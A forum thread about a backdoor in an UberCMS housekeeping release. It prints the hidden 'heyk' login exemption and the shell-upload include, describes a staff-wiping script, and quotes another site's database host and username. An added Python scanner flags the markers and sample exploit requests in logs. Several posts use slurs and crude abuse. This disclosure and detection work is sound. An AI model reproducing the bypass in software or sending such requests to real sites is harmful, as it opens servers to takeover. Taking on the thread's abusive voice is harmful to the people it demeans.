[UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

  1. #1
    Delici0us (I'm-a ruin you, cunt!) - Member, joined Apr 2008, Israel, 731 posts

    [UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).

    Warning

    If you choose not to update, then that is your fault. At the bottom of this page I have included the exploit and how you execute it (and where it is located). If you have been raped by this exploit you must also edit the me.php (and me tpl file) to remove the “Kill Staff” script that was also embedded in his previous release.


    Uber 2.x.x - Top Level Patch
    Another nail in Jonty’s coffin.

    Yesterday as you may have seen Jonty came back to release an update for UberCMS. I later found out it was just an update for the ASE (All Seeing Eye) folder that had contained an important and crucial bug fix. The fix was in there, I even witnessed the fix in place.

    After looking through the source earlier, after hearing about someone’s misfortune because of it, I found something quite intriguing – he had patched the exploit, but had included and revamped his previous one. This time he had coded a shell upload utility, which could be reached from within the ASE.

    Take a look at this [Code from the Index.php]
    Code:
    if (!HK_LOGGED_IN && $_cmd != 'login' && $_cmd != 'heyk')
    {
        header("Location: " . HK_WWW . "/index.php?_cmd=login");
        exit;
    }
    If you’re not into PHP or just don’t have a clue what that means in English, here it is: if the housekeeping session is not registered, and the command is not login or heyk, redirect to the login page.

    Well, what is ‘HeyK’ you may ask – it is the way he was activating the shell. When you look further down you can see how.

    Code:
        case 'heyk';
            require_once 'pages/yessir.php';
        break;
    The yessir.php page contained the upload script and that’s how some people got hacked.

    The ASE also contained another little trick, where he could also pass information to TPL files and as such write his own code. I know some sites have had their entire staff list deleted because of this.

    It also contained some other little tricks that he had embedded into other pages. I looked over most of the code, and because some of the things exist all the way back to when it was first released by him I have decided not to inform you of them.

    Yesterday I released his ASE as a patch, because at first that’s what I believed it to be. I would like to take this time to apologise to anyone that was poorly affected by this and in future I will ensure I read and clean all of his code before I try and help. This was inappropriate for him to do. And I sincerely hope nobody else gets attacked by him.

    On one last note, if you download my previous ASE download and his release – You will see they are identical.

    P.S - If you want to hate on me, or say I’m in the wrong… Please do! At least I came back to fix this shitty mess he made. Oh, and if you think I made all of this up? Why does he have the MySQL details for THC-Hotel?

    Code:
        $config['MySQL']['hostname'] = "216.245.213.26";
        $config['MySQL']['username'] = "thc_web";
        $config['MySQL']['password'] = "*******";
        $config['MySQL']['database'] = "thchotel";
    Last edited by Delici0us; 01-08-12 at 07:20 PM. Reason: Update of Patch
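    Added example, not code from this thread or from UberCMS: a Python scan that looks for the two things the post documents, the backdoor markers in the quoted index.php (the heyk exemption in the login check, the hidden heyk case, the include of pages/yessir.php) and access-log requests that invoked _cmd=heyk, which the exemption let through without a housekeeping session. The PHP fragment, log lines and IP addresses are constructed samples.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Source-level markers taken from the index.php snippets quoted in the post.
SOURCE_INDICATORS = {
    "heyk auth exemption": re.compile(r"\$_cmd\s*!=\s*['\"]heyk['\"]"),
    "hidden heyk case": re.compile(r"case\s*['\"]heyk['\"]\s*[:;]"),
    "yessir.php include": re.compile(r"require(?:_once)?\s*\(?\s*['\"]pages/yessir\.php"),
}

def scan_source(php_text):
    """Return the names of every backdoor marker present in a PHP source string."""
    return [name for name, rx in SOURCE_INDICATORS.items() if rx.search(php_text)]

# Common Log Format line: ip ident user [timestamp] "METHOD target HTTP/x" status size
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def find_heyk_requests(log_lines):
    """Return (ip, timestamp, path, status) per request that invoked _cmd=heyk; unparseable lines are skipped."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, ts, _method, target, status = m.groups()
        parts = urlsplit(target)
        if "heyk" in parse_qs(parts.query).get("_cmd", []):
            hits.append((ip, ts, parts.path, int(status)))
    return hits

# Constructed samples for the example: a dispatcher carrying the backdoor and a
# short access log; the IPs are from documentation ranges, not real hosts.
SAMPLE_INDEX_PHP = """<?php
if (!HK_LOGGED_IN && $_cmd != 'login' && $_cmd != 'heyk') { exit; }
switch ($_cmd) {
    case 'heyk';
        require_once 'pages/yessir.php';
    break;
}
"""
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Jan/2012:19:02:11 +0000] "GET /ase/index.php?_cmd=login HTTP/1.1" 200 812',
    '203.0.113.7 - - [08/Jan/2012:19:02:40 +0000] "GET /ase/index.php?_cmd=heyk HTTP/1.1" 200 1430',
    '198.51.100.9 - - [08/Jan/2012:19:03:05 +0000] "POST /ase/index.php?_cmd=heyk&f=1 HTTP/1.1" 200 77',
    "not a log line",
]

if __name__ == "__main__":
    print(scan_source(SAMPLE_INDEX_PHP), find_heyk_requests(SAMPLE_LOG))
```

    A clean ASE should return no source markers; any heyk hit in the log dates the exposure and gives the client address to follow up on.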


  2. #2
    Hejula (The one and only!) - Member, joined Nov 2008, 4,128 posts


    Wow, haha. Thanks for this, appreciated.

  3. #3
    PRIZM (Zephyr Studios) - Member, joined Feb 2012, Denmark, 2,291 posts


    Oh I like, thanks Delici0us

  4. #4
    Delici0us (I'm-a ruin you, cunt!) - Member, joined Apr 2008, Israel, 731 posts


    Quote Originally Posted by Hejula:
    Wow, haha. Thanks for this, appreciated.
    Glad I could be of assistance. Hopefully people become more wary of the code he feeds them and they learn to update.

    Quote Originally Posted by Lasse:
    Oh I like, thanks Delici0us
    My pleasure

    Hopefully this is the last time I have to patch his work.

  5. #5
    Bloodraven - Member, joined Sep 2009, Antarctica, 2,414 posts


    Jonty really is a complete twat then...

  6. #6
    Delici0us (I'm-a ruin you, cunt!) - Member, joined Apr 2008, Israel, 731 posts


    Quote Originally Posted by zJordan:
    Jonty really is a complete twat then...
    Did you expect anything else from him? He has an ego the size of a small planet; in his eyes the only hotel that deserves existence is ZAP (give him some credit, it’s a nice hotel). Lots of hotels have built up from his code so he must have seen a loophole for rape.

  7. #7
    Frippe - Member, joined Jun 2012, 66 posts


    Thanks for this! :) (maybe my ubercms has been hacked sometimes by this?).

    EDIT: What do you mean with: "If you have been raped from this exploit you must also edit the me.php (and me tpl file) to remove the “Kill Staff” script that was also embedded in his previous release."?
    Last edited by Frippe; 15-07-12 at 11:18 PM.

  8. #8
    Delici0us (I'm-a ruin you, cunt!) - Member, joined Apr 2008, Israel, 731 posts


    Quote Originally Posted by Frippe:
    Thanks for this! :) (maybe my ubercms has been hacked sometimes by this?).

    EDIT: What do you mean with: "If you have been raped from this exploit you must also edit the me.php (and me tpl file) to remove the “Kill Staff” script that was also embedded in his previous release."?
    If your hotel has staff, but the staff list keeps getting reset then the kill code has been inserted into the me.tpl (or me.php) that resets all ranks back to 1 every time it’s loaded.

  9. #9
    Frippe - Member, joined Jun 2012, 66 posts


    Quote Originally Posted by Delici0us:
    If your hotel has staff, but the staff list keeps getting reset then the kill code has been inserted into the me.tpl (or me.php) that resets all ranks back to 1 every time it’s loaded.
    Yes it has on my cms!! What do I do?! I've downloaded the patch so it is fine now? This is annoying!

  10. #10
    Nilenz (hoi) - Member, joined May 2011, The Netherlands, 380 posts


    Thanks for the fix for exploits and backdoors.
    I will be using this.

  11. #11
    Delici0us (I'm-a ruin you, cunt!) - Member, joined Apr 2008, Israel, 731 posts


    Quote Originally Posted by Frippe:
    Lasse, ignore please?
    Send me the link to your hotel in PM and I'll tell you if you have been infected. If you have I'll clean it for you.

  12. #12
    Frippe - Member, joined Jun 2012, 66 posts


    Quote Originally Posted by Delici0us:
    Send me the link to your hotel in PM and I'll tell you if you have been infected. If you have I'll clean it for you.
    I think it's fixed now but I will send you a PM if I still have the problem.

  13. #13
    Zak© (Alpha Member) - Member, joined Oct 2007, 2,693 posts


    Lol serves you all right for trusting that twat again.

  14. #14
    djboetz (IT-Developer) - Member, joined Aug 2010, Sweden, 210 posts


    As I said several times before, a lot of people did not believe me.
    "Jonty puts an exploit in every work he releases FREE in public"; he has hacked my hotel as well some months ago.

  15. #15
    Liam (Gamma Spamma) - Member, joined Dec 2011, Down Under, 2,946 posts


    Now, this is exactly why you don't always rely on fuck heads like Jonty for your hotel; it's always best to make your own edit, or to learn PHP.. And hasn't anyone learnt from Jonty's past, how much of a faggot he is? No one ever listens to other members, and trust me, Jonty is just greedy..


